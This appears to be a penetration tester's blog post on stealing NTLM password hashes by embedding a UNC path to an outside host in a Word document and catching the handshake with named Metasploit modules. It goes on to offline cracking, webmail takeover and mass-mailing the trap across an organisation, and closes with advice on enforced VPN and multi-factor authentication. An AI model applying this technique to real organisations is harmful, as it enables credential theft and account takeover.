Malicious UNC Paths (SMB) / Bad Egress / No-Split VPN

When attempting social engineering or red teaming engagements I often choose to embed various HTTP/UNC paths inside an attachment, e.g. Word/Excel/PDF. The best thing about embedding this malicious URL is that it does not warn the user of any external content loading. You can also do this directly inside an email but the user will get warned of loading external content, especially inside outlook which is the most widely used email client in a corporate environment. Other vendor settings do vary so it’s worth doing reconnaissance on your target before aiming to penetrate their external defenses.

Email reconnaissance can be done via embedding a simple HTTP request or even viewing email headers from an automated response or out-of-office reply.

The reason this is also quite interesting to me is that companies often have great egress controls inside their organisation, but when working remotely in a coffee shop, working from home or over a smartphone tether the employees are free to connect without any form of security or logging from a perimeter firewall perspective. Companies should deploy and enforce (via technical controls) no-split VPN connections in order to control the traffic flow between their own assets. This not only helps maintain a controlled logging and monitoring solution but also keeps enforced the integrity of traffic to and from the device. It should not be left the employees home firewall or in most cases a default BT Homehub router.

Example:

Create a new document (test.docx) and embed a UNC path that is located on an Internet facing host, e.g. \\204.200.200.200\logo.png

This can be done using the Metasploit module word_unc_injector (auxiliary/docx/word_unc_injector) or manually via the GUI.

unc

Then setup the SMB auxiliary module (auxiliary/server/capture/smb) in order to capture the client handshake. The beauty with domain configured UNC paths is the ability to capture the NTLM challenge/response packet which can be used to perform an off-line brute-force attack against their password. Again, the beauty with this is as long as you haven’t sent the user anything out of the ordinary then the end-user will not suspect anything at all and this will allow you time to crack their password.

smb

Once you have domain user accounts and passwords you can go on the hunt for any externally facing single factor systems, such as Microsoft Lync, Webmail, or any other single factor system available to the Internet.

The moral of the story is clients should not be relying on end-user’s to implement secure technical controls from their home offices, nor should you rely on a single factor system in this day and age.

There is a million other things that can be done once you have access to systems such as webmail, which includes sending embedded UNC paths to the entire organisation as if you send from a trusted address, the email client will automatically attempt to download the image over SMB and you will have a air-strike of hashes from the target organization.

 

Leave a comment

Your email address will not be published. Required fields are marked *